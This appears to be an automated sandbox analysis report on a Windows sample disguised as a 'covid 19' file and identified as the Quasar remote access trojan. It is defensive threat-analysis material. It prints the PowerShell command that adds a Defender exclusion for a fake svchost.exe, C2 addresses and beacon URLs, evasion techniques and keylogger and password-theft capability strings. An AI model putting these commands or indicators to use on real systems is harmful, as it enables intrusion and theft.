Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New variant of covid 19.exe

Overview

General Information

Sample Name:New variant of covid 19.exe
Analysis ID:365752
MD5:a489513ca0de2472e0ad79830dd9ac44
SHA1:b767fe686e074f551773f208e1cb756d114e38c4
SHA256:df12835cd6bc77f9724900d2bf8f0403364ce6e8e81d389f8dc3b2eb8ca42961
Infos:

Most interesting Screenshot:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
System process connects to network (likely due to code injection or exploit)
Yara detected Quasar RAT
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
May check the online IP address of the machine
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to delay execution (extensive OutputDebugStringW loop)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • New variant of covid 19.exe (PID: 6372 cmdline: 'C:\Users\user\Desktop\New variant of covid 19.exe' MD5: A489513CA0DE2472E0AD79830DD9AC44)
    • powershell.exe (PID: 6864 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6884 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 7008 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • New variant of covid 19.exe (PID: 7152 cmdline: C:\Users\user\Desktop\New variant of covid 19.exe MD5: A489513CA0DE2472E0AD79830DD9AC44)
    • WerFault.exe (PID: 5488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6132 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6156 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6460 cmdline: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: A489513CA0DE2472E0AD79830DD9AC44)
      • powershell.exe (PID: 6552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3440 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 5888 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • svchost.exe (PID: 1488 cmdline: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe MD5: A489513CA0DE2472E0AD79830DD9AC44)
  • svchost.exe (PID: 6568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6964 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 7112 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6988 cmdline: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: A489513CA0DE2472E0AD79830DD9AC44)
  • svchost.exe (PID: 5652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4144 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1240 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5820 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6628 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4952 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7032 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
  • 0x3df40:$s1: DoUploadAndExecute
  • 0x3e184:$s2: DoDownloadAndExecute
  • 0x3dd05:$s3: DoShellExecute
  • 0x3e13c:$s4: set_Processname
  • 0x5824:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5748:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x61ae:$op3: 00 04 03 69 91 1B 40
  • 0x69fe:$op3: 00 04 03 69 91 1B 40
0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    Process Memory Space: New variant of covid 19.exe PID: 7152JoeSecurity_QuasarYara detected Quasar RATJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.New variant of covid 19.exe.400000.0.unpackVermin_Keylogger_Jan18_1Detects Vermin KeyloggerFlorian Roth
      • 0x3ec23:$x3: GetKeyloggerLogsResponse
      • 0x3de7b:$x4: GetKeyloggerLogs
      • 0x3e153:$s1: <RunHidden>k__BackingField
      • 0x3edeb:$s2: set_SystemInfos
      • 0x3e17c:$s3: set_RunHidden
      • 0x3dcaf:$s4: set_RemotePath
      • 0x32027:$s7: xClient.Core.ReverseProxy.Packets
      10.2.New variant of covid 19.exe.400000.0.unpackxRAT_1Detects Patchwork malwareFlorian Roth
      • 0x305c0:$x4: xClient.Properties.Resources.resources
      • 0x30481:$s4: Client.exe
      • 0x3e17c:$s7: set_RunHidden
      10.2.New variant of covid 19.exe.400000.0.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
      • 0x3e140:$s1: DoUploadAndExecute
      • 0x3e384:$s2: DoDownloadAndExecute
      • 0x3df05:$s3: DoShellExecute
      • 0x3e33c:$s4: set_Processname
      • 0x5a24:$op1: 04 1E FE 02 04 16 FE 01 60
      • 0x5948:$op2: 00 17 03 1F 20 17 19 15 28
      • 0x63ae:$op3: 00 04 03 69 91 1B 40
      • 0x6bfe:$op3: 00 04 03 69 91 1B 40
      10.2.New variant of covid 19.exe.400000.0.unpackQuasar_RAT_2Detects Quasar RATFlorian Roth
      • 0x3ec23:$x1: GetKeyloggerLogsResponse
      • 0x3ee63:$s1: DoShellExecuteResponse
      • 0x3e7d2:$s2: GetPasswordsResponse
      • 0x3ed36:$s3: GetStartupItemsResponse
      • 0x3e154:$s5: RunHidden
      • 0x3e172:$s5: RunHidden
      • 0x3e180:$s5: RunHidden
      • 0x3e194:$s5: RunHidden
      10.2.New variant of covid 19.exe.400000.0.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
      • 0x4f661:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 ...
      • 0x4f897:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C ...
      Click to see the 2 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Executables Started in Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
      Sigma detected: Execution in Non-Executable FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
      Sigma detected: Suspicious Program Location Process StartsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
      Sigma detected: System File Execution Location AnomalyShow sources
      Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
      Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: liverpoolofcfanclub.comVirustotal: Detection: 8%Perma Link
      Source: devils.shacknet.usVirustotal: Detection: 9%Perma Link
      Yara detected Quasar RATShow sources
      Source: Yara matchFile source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
      Source: Yara matchFile source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE
      Source: New variant of covid 19.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

      Networking:

      barindex
      May check the online IP address of the machineShow sources
      Source: unknownDNS query: name: ip-api.com
      Source: global trafficTCP traffic: 192.168.2.3:49717 -> 103.28.70.164:4782
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolofcfanclub.com
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a 